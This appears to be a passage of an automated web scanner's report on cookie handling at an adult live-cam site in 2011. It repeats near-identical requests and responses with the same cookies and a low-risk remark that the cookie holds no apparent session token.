GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:42 GMT Connection: close Content-Length: 33116 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/caught-on-cam/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:21 GMT Connection: close Content-Length: 25588 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:30 GMT Connection: close Content-Length: 110732 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/fetish/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:51 GMT Connection: close Content-Length: 212158 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/fetish/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:44 GMT Connection: close Content-Length: 24479 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:53 GMT Connection: close Content-Length: 72506 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/free-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoidMay82O9Ww8iIgmnpOkaYYd%2bRloG%2b4CAmxrVQ%2bGzRheecUYgUyCFOOp2ODZpcVY%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:47 GMT Connection: close Content-Length: 51624 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/gay-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:18 GMT Connection: close Content-Length: 33498 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/gay/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:55 GMT Connection: close Content-Length: 194997 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/guy-alone/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:44 GMT Connection: close Content-Length: 69731 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/happyhour/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:55 GMT Connection: close Content-Length: 22310 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/lesbian-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; 